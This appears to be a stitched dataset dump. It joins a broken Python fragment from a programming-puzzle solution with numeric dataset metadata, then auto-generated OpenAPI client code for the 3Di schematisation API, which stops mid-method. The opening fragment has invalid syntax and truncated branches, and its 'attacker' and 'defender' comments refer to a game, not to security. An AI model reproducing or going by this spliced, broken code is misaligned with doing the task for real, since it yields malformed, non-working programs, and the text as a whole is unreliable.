if(a[i]<b[i] and count==0 and (a[i] in l)):
l.add(a[i])
l.add(b[i])
count=0
else:
count=1
break
if(count==0):
stdout.write("YES"+'\n')
else:
stdout.write("NO"+'\n')
if(s==2):
while(t>0):
t=t-1
n=int(stdin.readline())
a=[int(x) for x in stdin.readline().split()]
b=[int(x) for x in stdin.readline().split()]
a.sort()
b.sort()
l=set()
l.add(a[0])
count=0
for i in range(0,n):
if(a[i]<b[i] and count==0 and (a[i] in l)):
l.add(a[i])
l.add(b[i])
count=0
else:
# while(
if(a[i]>=b[i]):
#Defender gives up
b=b+a[0:i+1]
a=a[i+1:]
else:
#attacker gives up
count=1
a=a[i:
break
if(count==0):
stdout.write("YES"+'\n')
else:
| 27.051724
| 56
| 0.341619
| 209
| 1,569
| 2.564593
| 0.191388
| 0.033582
| 0.052239
| 0.059701
| 0.761194
| 0.75
| 0.75
| 0.75
| 0.75
| 0.630597
| 0
| 0.029337
| 0.500319
| 1,569
| 57
| 57
| 27.526316
| 0.654337
| 0
| 0
| 0.826923
| 0
| 0
| 0.009576
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.019231
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f15eaefccd54f4b03e848081ce89a86147403875
| 316,691
|
py
|
Python
|
threedi_api_client/openapi/api/v3_beta_api.py
|
nens/threedi-api-client
|
43b0eb1bd47310b1783f87f6ad8bfbfe0fb4d90a
|
[
"BSD-3-Clause"
] | null | null | null |
threedi_api_client/openapi/api/v3_beta_api.py
|
nens/threedi-api-client
|
43b0eb1bd47310b1783f87f6ad8bfbfe0fb4d90a
|
[
"BSD-3-Clause"
] | 16
|
2021-05-31T09:52:04.000Z
|
2022-03-14T16:07:19.000Z
|
threedi_api_client/openapi/api/v3_beta_api.py
|
nens/threedi-api-client
|
43b0eb1bd47310b1783f87f6ad8bfbfe0fb4d90a
|
[
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
"""
3Di API
3Di simulation API (latest stable version: v3) Framework release: 2.9.0 3Di core release: 2.2.2 deployed on: 11:01AM (UTC) on January 11, 2022 # noqa: E501
The version of the OpenAPI document: v3
Contact: info@nelen-schuurmans.nl
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from threedi_api_client.openapi.api_client import ApiClient
from threedi_api_client.openapi.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class V3BetaApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def schematisations_create(self, data, **kwargs): # noqa: E501
"""schematisations_create # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_create(data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Schematisation data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Schematisation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_create_with_http_info(data, **kwargs) # noqa: E501
def schematisations_create_with_http_info(self, data, **kwargs): # noqa: E501
"""schematisations_create # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_create_with_http_info(data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Schematisation data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Schematisation, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_create" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_create`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Schematisation', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_delete(self, id, **kwargs): # noqa: E501
"""schematisations_delete # noqa: E501
Schematisation can only be deleted when all commited revisions are deleted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_delete(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_delete_with_http_info(id, **kwargs) # noqa: E501
def schematisations_delete_with_http_info(self, id, **kwargs): # noqa: E501
"""schematisations_delete # noqa: E501
Schematisation can only be deleted when all commited revisions are deleted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_delete_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{id}/', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_latest_revision(self, id, **kwargs): # noqa: E501
"""Get the latest committed revision. # noqa: E501
For retrieving all revisions use: `/schematisations/{id}/revisions` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_latest_revision(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: SchematisationRevision
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_latest_revision_with_http_info(id, **kwargs) # noqa: E501
def schematisations_latest_revision_with_http_info(self, id, **kwargs): # noqa: E501
"""Get the latest committed revision. # noqa: E501
For retrieving all revisions use: `/schematisations/{id}/revisions` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_latest_revision_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(SchematisationRevision, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_latest_revision" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_latest_revision`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{id}/latest_revision/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SchematisationRevision', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_list(self, **kwargs): # noqa: E501
"""schematisations_list # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str created__range: Multiple values may be separated by commas.
:param str created__date:
:param str created__date__gt:
:param str created__date__gte:
:param str created__date__lt:
:param str created__date__lte:
:param float created__year:
:param float created__year__gt:
:param float created__year__gte:
:param float created__year__lt:
:param float created__year__lte:
:param float created__month:
:param float created__month__lte:
:param float created__day:
:param float created__day__lt:
:param float created__week:
:param float created__week_day:
:param float created__quarter:
:param str created__time:
:param float created__hour:
:param float created__minute:
:param float created__second:
:param str created__isnull:
:param str last_updated__range: Multiple values may be separated by commas.
:param str last_updated__date:
:param str last_updated__date__gt:
:param str last_updated__date__gte:
:param str last_updated__date__lt:
:param str last_updated__date__lte:
:param float last_updated__year:
:param float last_updated__year__gt:
:param float last_updated__year__gte:
:param float last_updated__year__lt:
:param float last_updated__year__lte:
:param float last_updated__month:
:param float last_updated__month__lte:
:param float last_updated__day:
:param float last_updated__day__lt:
:param float last_updated__week:
:param float last_updated__week_day:
:param float last_updated__quarter:
:param str last_updated__time:
:param float last_updated__hour:
:param float last_updated__minute:
:param float last_updated__second:
:param str last_updated__isnull:
:param str created_by__username:
:param str created_by__username__iexact:
:param str created_by__username__contains:
:param str created_by__username__icontains:
:param str created_by__username__in: Multiple values may be separated by commas.
:param str created_by__username__startswith:
:param str created_by__username__istartswith:
:param str created_by__username__endswith:
:param str created_by__username__regex:
:param str name:
:param str name__iexact:
:param str name__contains:
:param str name__icontains:
:param str name__in: Multiple values may be separated by commas.
:param str name__startswith:
:param str name__istartswith:
:param str name__endswith:
:param str name__regex:
:param str slug:
:param str slug__iexact:
:param str slug__contains:
:param str slug__icontains:
:param str slug__in: Multiple values may be separated by commas.
:param str slug__startswith:
:param str slug__istartswith:
:param str slug__endswith:
:param str slug__regex:
:param str owner__name:
:param str owner__name__iexact:
:param str owner__name__contains:
:param str owner__name__icontains:
:param str owner__name__in: Multiple values may be separated by commas.
:param str owner__name__startswith:
:param str owner__name__istartswith:
:param str owner__name__endswith:
:param str owner__name__regex:
:param str owner__unique_id:
:param str owner__unique_id__iexact:
:param str owner__unique_id__contains:
:param str owner__unique_id__icontains:
:param str owner__unique_id__in: Multiple values may be separated by commas.
:param str owner__unique_id__startswith:
:param str owner__unique_id__istartswith:
:param str owner__unique_id__endswith:
:param str owner__unique_id__regex:
:param str tags__in:
:param str ordering: Which field to use when ordering the results.
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_list_with_http_info(**kwargs) # noqa: E501
def schematisations_list_with_http_info(self, **kwargs): # noqa: E501
"""schematisations_list # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str created__range: Multiple values may be separated by commas.
:param str created__date:
:param str created__date__gt:
:param str created__date__gte:
:param str created__date__lt:
:param str created__date__lte:
:param float created__year:
:param float created__year__gt:
:param float created__year__gte:
:param float created__year__lt:
:param float created__year__lte:
:param float created__month:
:param float created__month__lte:
:param float created__day:
:param float created__day__lt:
:param float created__week:
:param float created__week_day:
:param float created__quarter:
:param str created__time:
:param float created__hour:
:param float created__minute:
:param float created__second:
:param str created__isnull:
:param str last_updated__range: Multiple values may be separated by commas.
:param str last_updated__date:
:param str last_updated__date__gt:
:param str last_updated__date__gte:
:param str last_updated__date__lt:
:param str last_updated__date__lte:
:param float last_updated__year:
:param float last_updated__year__gt:
:param float last_updated__year__gte:
:param float last_updated__year__lt:
:param float last_updated__year__lte:
:param float last_updated__month:
:param float last_updated__month__lte:
:param float last_updated__day:
:param float last_updated__day__lt:
:param float last_updated__week:
:param float last_updated__week_day:
:param float last_updated__quarter:
:param str last_updated__time:
:param float last_updated__hour:
:param float last_updated__minute:
:param float last_updated__second:
:param str last_updated__isnull:
:param str created_by__username:
:param str created_by__username__iexact:
:param str created_by__username__contains:
:param str created_by__username__icontains:
:param str created_by__username__in: Multiple values may be separated by commas.
:param str created_by__username__startswith:
:param str created_by__username__istartswith:
:param str created_by__username__endswith:
:param str created_by__username__regex:
:param str name:
:param str name__iexact:
:param str name__contains:
:param str name__icontains:
:param str name__in: Multiple values may be separated by commas.
:param str name__startswith:
:param str name__istartswith:
:param str name__endswith:
:param str name__regex:
:param str slug:
:param str slug__iexact:
:param str slug__contains:
:param str slug__icontains:
:param str slug__in: Multiple values may be separated by commas.
:param str slug__startswith:
:param str slug__istartswith:
:param str slug__endswith:
:param str slug__regex:
:param str owner__name:
:param str owner__name__iexact:
:param str owner__name__contains:
:param str owner__name__icontains:
:param str owner__name__in: Multiple values may be separated by commas.
:param str owner__name__startswith:
:param str owner__name__istartswith:
:param str owner__name__endswith:
:param str owner__name__regex:
:param str owner__unique_id:
:param str owner__unique_id__iexact:
:param str owner__unique_id__contains:
:param str owner__unique_id__icontains:
:param str owner__unique_id__in: Multiple values may be separated by commas.
:param str owner__unique_id__startswith:
:param str owner__unique_id__istartswith:
:param str owner__unique_id__endswith:
:param str owner__unique_id__regex:
:param str tags__in:
:param str ordering: Which field to use when ordering the results.
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse200, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'created__range',
'created__date',
'created__date__gt',
'created__date__gte',
'created__date__lt',
'created__date__lte',
'created__year',
'created__year__gt',
'created__year__gte',
'created__year__lt',
'created__year__lte',
'created__month',
'created__month__lte',
'created__day',
'created__day__lt',
'created__week',
'created__week_day',
'created__quarter',
'created__time',
'created__hour',
'created__minute',
'created__second',
'created__isnull',
'last_updated__range',
'last_updated__date',
'last_updated__date__gt',
'last_updated__date__gte',
'last_updated__date__lt',
'last_updated__date__lte',
'last_updated__year',
'last_updated__year__gt',
'last_updated__year__gte',
'last_updated__year__lt',
'last_updated__year__lte',
'last_updated__month',
'last_updated__month__lte',
'last_updated__day',
'last_updated__day__lt',
'last_updated__week',
'last_updated__week_day',
'last_updated__quarter',
'last_updated__time',
'last_updated__hour',
'last_updated__minute',
'last_updated__second',
'last_updated__isnull',
'created_by__username',
'created_by__username__iexact',
'created_by__username__contains',
'created_by__username__icontains',
'created_by__username__in',
'created_by__username__startswith',
'created_by__username__istartswith',
'created_by__username__endswith',
'created_by__username__regex',
'name',
'name__iexact',
'name__contains',
'name__icontains',
'name__in',
'name__startswith',
'name__istartswith',
'name__endswith',
'name__regex',
'slug',
'slug__iexact',
'slug__contains',
'slug__icontains',
'slug__in',
'slug__startswith',
'slug__istartswith',
'slug__endswith',
'slug__regex',
'owner__name',
'owner__name__iexact',
'owner__name__contains',
'owner__name__icontains',
'owner__name__in',
'owner__name__startswith',
'owner__name__istartswith',
'owner__name__endswith',
'owner__name__regex',
'owner__unique_id',
'owner__unique_id__iexact',
'owner__unique_id__contains',
'owner__unique_id__icontains',
'owner__unique_id__in',
'owner__unique_id__startswith',
'owner__unique_id__istartswith',
'owner__unique_id__endswith',
'owner__unique_id__regex',
'tags__in',
'ordering',
'limit',
'offset'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_list" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'created__range' in local_var_params and local_var_params['created__range'] is not None: # noqa: E501
query_params.append(('created__range', local_var_params['created__range'])) # noqa: E501
if 'created__date' in local_var_params and local_var_params['created__date'] is not None: # noqa: E501
query_params.append(('created__date', local_var_params['created__date'])) # noqa: E501
if 'created__date__gt' in local_var_params and local_var_params['created__date__gt'] is not None: # noqa: E501
query_params.append(('created__date__gt', local_var_params['created__date__gt'])) # noqa: E501
if 'created__date__gte' in local_var_params and local_var_params['created__date__gte'] is not None: # noqa: E501
query_params.append(('created__date__gte', local_var_params['created__date__gte'])) # noqa: E501
if 'created__date__lt' in local_var_params and local_var_params['created__date__lt'] is not None: # noqa: E501
query_params.append(('created__date__lt', local_var_params['created__date__lt'])) # noqa: E501
if 'created__date__lte' in local_var_params and local_var_params['created__date__lte'] is not None: # noqa: E501
query_params.append(('created__date__lte', local_var_params['created__date__lte'])) # noqa: E501
if 'created__year' in local_var_params and local_var_params['created__year'] is not None: # noqa: E501
query_params.append(('created__year', local_var_params['created__year'])) # noqa: E501
if 'created__year__gt' in local_var_params and local_var_params['created__year__gt'] is not None: # noqa: E501
query_params.append(('created__year__gt', local_var_params['created__year__gt'])) # noqa: E501
if 'created__year__gte' in local_var_params and local_var_params['created__year__gte'] is not None: # noqa: E501
query_params.append(('created__year__gte', local_var_params['created__year__gte'])) # noqa: E501
if 'created__year__lt' in local_var_params and local_var_params['created__year__lt'] is not None: # noqa: E501
query_params.append(('created__year__lt', local_var_params['created__year__lt'])) # noqa: E501
if 'created__year__lte' in local_var_params and local_var_params['created__year__lte'] is not None: # noqa: E501
query_params.append(('created__year__lte', local_var_params['created__year__lte'])) # noqa: E501
if 'created__month' in local_var_params and local_var_params['created__month'] is not None: # noqa: E501
query_params.append(('created__month', local_var_params['created__month'])) # noqa: E501
if 'created__month__lte' in local_var_params and local_var_params['created__month__lte'] is not None: # noqa: E501
query_params.append(('created__month__lte', local_var_params['created__month__lte'])) # noqa: E501
if 'created__day' in local_var_params and local_var_params['created__day'] is not None: # noqa: E501
query_params.append(('created__day', local_var_params['created__day'])) # noqa: E501
if 'created__day__lt' in local_var_params and local_var_params['created__day__lt'] is not None: # noqa: E501
query_params.append(('created__day__lt', local_var_params['created__day__lt'])) # noqa: E501
if 'created__week' in local_var_params and local_var_params['created__week'] is not None: # noqa: E501
query_params.append(('created__week', local_var_params['created__week'])) # noqa: E501
if 'created__week_day' in local_var_params and local_var_params['created__week_day'] is not None: # noqa: E501
query_params.append(('created__week_day', local_var_params['created__week_day'])) # noqa: E501
if 'created__quarter' in local_var_params and local_var_params['created__quarter'] is not None: # noqa: E501
query_params.append(('created__quarter', local_var_params['created__quarter'])) # noqa: E501
if 'created__time' in local_var_params and local_var_params['created__time'] is not None: # noqa: E501
query_params.append(('created__time', local_var_params['created__time'])) # noqa: E501
if 'created__hour' in local_var_params and local_var_params['created__hour'] is not None: # noqa: E501
query_params.append(('created__hour', local_var_params['created__hour'])) # noqa: E501
if 'created__minute' in local_var_params and local_var_params['created__minute'] is not None: # noqa: E501
query_params.append(('created__minute', local_var_params['created__minute'])) # noqa: E501
if 'created__second' in local_var_params and local_var_params['created__second'] is not None: # noqa: E501
query_params.append(('created__second', local_var_params['created__second'])) # noqa: E501
if 'created__isnull' in local_var_params and local_var_params['created__isnull'] is not None: # noqa: E501
query_params.append(('created__isnull', local_var_params['created__isnull'])) # noqa: E501
if 'last_updated__range' in local_var_params and local_var_params['last_updated__range'] is not None: # noqa: E501
query_params.append(('last_updated__range', local_var_params['last_updated__range'])) # noqa: E501
if 'last_updated__date' in local_var_params and local_var_params['last_updated__date'] is not None: # noqa: E501
query_params.append(('last_updated__date', local_var_params['last_updated__date'])) # noqa: E501
if 'last_updated__date__gt' in local_var_params and local_var_params['last_updated__date__gt'] is not None: # noqa: E501
query_params.append(('last_updated__date__gt', local_var_params['last_updated__date__gt'])) # noqa: E501
if 'last_updated__date__gte' in local_var_params and local_var_params['last_updated__date__gte'] is not None: # noqa: E501
query_params.append(('last_updated__date__gte', local_var_params['last_updated__date__gte'])) # noqa: E501
if 'last_updated__date__lt' in local_var_params and local_var_params['last_updated__date__lt'] is not None: # noqa: E501
query_params.append(('last_updated__date__lt', local_var_params['last_updated__date__lt'])) # noqa: E501
if 'last_updated__date__lte' in local_var_params and local_var_params['last_updated__date__lte'] is not None: # noqa: E501
query_params.append(('last_updated__date__lte', local_var_params['last_updated__date__lte'])) # noqa: E501
if 'last_updated__year' in local_var_params and local_var_params['last_updated__year'] is not None: # noqa: E501
query_params.append(('last_updated__year', local_var_params['last_updated__year'])) # noqa: E501
if 'last_updated__year__gt' in local_var_params and local_var_params['last_updated__year__gt'] is not None: # noqa: E501
query_params.append(('last_updated__year__gt', local_var_params['last_updated__year__gt'])) # noqa: E501
if 'last_updated__year__gte' in local_var_params and local_var_params['last_updated__year__gte'] is not None: # noqa: E501
query_params.append(('last_updated__year__gte', local_var_params['last_updated__year__gte'])) # noqa: E501
if 'last_updated__year__lt' in local_var_params and local_var_params['last_updated__year__lt'] is not None: # noqa: E501
query_params.append(('last_updated__year__lt', local_var_params['last_updated__year__lt'])) # noqa: E501
if 'last_updated__year__lte' in local_var_params and local_var_params['last_updated__year__lte'] is not None: # noqa: E501
query_params.append(('last_updated__year__lte', local_var_params['last_updated__year__lte'])) # noqa: E501
if 'last_updated__month' in local_var_params and local_var_params['last_updated__month'] is not None: # noqa: E501
query_params.append(('last_updated__month', local_var_params['last_updated__month'])) # noqa: E501
if 'last_updated__month__lte' in local_var_params and local_var_params['last_updated__month__lte'] is not None: # noqa: E501
query_params.append(('last_updated__month__lte', local_var_params['last_updated__month__lte'])) # noqa: E501
if 'last_updated__day' in local_var_params and local_var_params['last_updated__day'] is not None: # noqa: E501
query_params.append(('last_updated__day', local_var_params['last_updated__day'])) # noqa: E501
if 'last_updated__day__lt' in local_var_params and local_var_params['last_updated__day__lt'] is not None: # noqa: E501
query_params.append(('last_updated__day__lt', local_var_params['last_updated__day__lt'])) # noqa: E501
if 'last_updated__week' in local_var_params and local_var_params['last_updated__week'] is not None: # noqa: E501
query_params.append(('last_updated__week', local_var_params['last_updated__week'])) # noqa: E501
if 'last_updated__week_day' in local_var_params and local_var_params['last_updated__week_day'] is not None: # noqa: E501
query_params.append(('last_updated__week_day', local_var_params['last_updated__week_day'])) # noqa: E501
if 'last_updated__quarter' in local_var_params and local_var_params['last_updated__quarter'] is not None: # noqa: E501
query_params.append(('last_updated__quarter', local_var_params['last_updated__quarter'])) # noqa: E501
if 'last_updated__time' in local_var_params and local_var_params['last_updated__time'] is not None: # noqa: E501
query_params.append(('last_updated__time', local_var_params['last_updated__time'])) # noqa: E501
if 'last_updated__hour' in local_var_params and local_var_params['last_updated__hour'] is not None: # noqa: E501
query_params.append(('last_updated__hour', local_var_params['last_updated__hour'])) # noqa: E501
if 'last_updated__minute' in local_var_params and local_var_params['last_updated__minute'] is not None: # noqa: E501
query_params.append(('last_updated__minute', local_var_params['last_updated__minute'])) # noqa: E501
if 'last_updated__second' in local_var_params and local_var_params['last_updated__second'] is not None: # noqa: E501
query_params.append(('last_updated__second', local_var_params['last_updated__second'])) # noqa: E501
if 'last_updated__isnull' in local_var_params and local_var_params['last_updated__isnull'] is not None: # noqa: E501
query_params.append(('last_updated__isnull', local_var_params['last_updated__isnull'])) # noqa: E501
if 'created_by__username' in local_var_params and local_var_params['created_by__username'] is not None: # noqa: E501
query_params.append(('created_by__username', local_var_params['created_by__username'])) # noqa: E501
if 'created_by__username__iexact' in local_var_params and local_var_params['created_by__username__iexact'] is not None: # noqa: E501
query_params.append(('created_by__username__iexact', local_var_params['created_by__username__iexact'])) # noqa: E501
if 'created_by__username__contains' in local_var_params and local_var_params['created_by__username__contains'] is not None: # noqa: E501
query_params.append(('created_by__username__contains', local_var_params['created_by__username__contains'])) # noqa: E501
if 'created_by__username__icontains' in local_var_params and local_var_params['created_by__username__icontains'] is not None: # noqa: E501
query_params.append(('created_by__username__icontains', local_var_params['created_by__username__icontains'])) # noqa: E501
if 'created_by__username__in' in local_var_params and local_var_params['created_by__username__in'] is not None: # noqa: E501
query_params.append(('created_by__username__in', local_var_params['created_by__username__in'])) # noqa: E501
if 'created_by__username__startswith' in local_var_params and local_var_params['created_by__username__startswith'] is not None: # noqa: E501
query_params.append(('created_by__username__startswith', local_var_params['created_by__username__startswith'])) # noqa: E501
if 'created_by__username__istartswith' in local_var_params and local_var_params['created_by__username__istartswith'] is not None: # noqa: E501
query_params.append(('created_by__username__istartswith', local_var_params['created_by__username__istartswith'])) # noqa: E501
if 'created_by__username__endswith' in local_var_params and local_var_params['created_by__username__endswith'] is not None: # noqa: E501
query_params.append(('created_by__username__endswith', local_var_params['created_by__username__endswith'])) # noqa: E501
if 'created_by__username__regex' in local_var_params and local_var_params['created_by__username__regex'] is not None: # noqa: E501
query_params.append(('created_by__username__regex', local_var_params['created_by__username__regex'])) # noqa: E501
if 'name' in local_var_params and local_var_params['name'] is not None: # noqa: E501
query_params.append(('name', local_var_params['name'])) # noqa: E501
if 'name__iexact' in local_var_params and local_var_params['name__iexact'] is not None: # noqa: E501
query_params.append(('name__iexact', local_var_params['name__iexact'])) # noqa: E501
if 'name__contains' in local_var_params and local_var_params['name__contains'] is not None: # noqa: E501
query_params.append(('name__contains', local_var_params['name__contains'])) # noqa: E501
if 'name__icontains' in local_var_params and local_var_params['name__icontains'] is not None: # noqa: E501
query_params.append(('name__icontains', local_var_params['name__icontains'])) # noqa: E501
if 'name__in' in local_var_params and local_var_params['name__in'] is not None: # noqa: E501
query_params.append(('name__in', local_var_params['name__in'])) # noqa: E501
if 'name__startswith' in local_var_params and local_var_params['name__startswith'] is not None: # noqa: E501
query_params.append(('name__startswith', local_var_params['name__startswith'])) # noqa: E501
if 'name__istartswith' in local_var_params and local_var_params['name__istartswith'] is not None: # noqa: E501
query_params.append(('name__istartswith', local_var_params['name__istartswith'])) # noqa: E501
